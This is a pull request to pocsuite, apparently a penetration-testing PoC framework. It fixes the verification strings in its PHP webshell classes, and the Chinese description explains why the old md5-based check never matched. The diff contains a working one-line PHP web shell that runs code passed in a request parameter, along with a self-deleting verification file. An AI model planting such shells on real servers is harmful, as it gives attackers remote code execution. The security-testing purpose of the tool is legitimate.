### PR TITLE
Fix PhpShell and PhpVerify bug

### DIFF
--- a/pocsuite/lib/utils/webshell.py
+++ b/pocsuite/lib/utils/webshell.py
@@ -141,9 +141,9 @@ class PhpShell(Webshell):
     _keyword = randomStr(20)
     _password = 'cmd'
     _content = "<?php @assert($_REQUEST['{0}']);?>"
-    _check_statement = 'var_dump(md5(' + _keyword + '));'
+    _check_statement = 'var_dump("' + _keyword + '");'
 
 
 class PhpVerify(VerifyShell):
     _keyword = randomStr(20)
-    _content = "<?php var_dump(md5(" + _keyword + "));unlink(__FILE__);?>"
+    _content = "<?php var_dump('" + _keyword + "');unlink(__FILE__);?>"


### PR DESCRIPTION
PhpShell和PhpVerify中，生成的php代码直接将20位随机数作为变量使用，当20位随机数为全数字时没有问题，但当这个随机数出现数字和字符混合时，如果服务器端关闭了错误回显，验证时返回页面就会为空；另外，原代码中使用了md5函数对随机数进行混淆，但是验证的时候却是在返回页面中招关键词（随机数），很显然不可能找到，从而导致验证恒不能成功。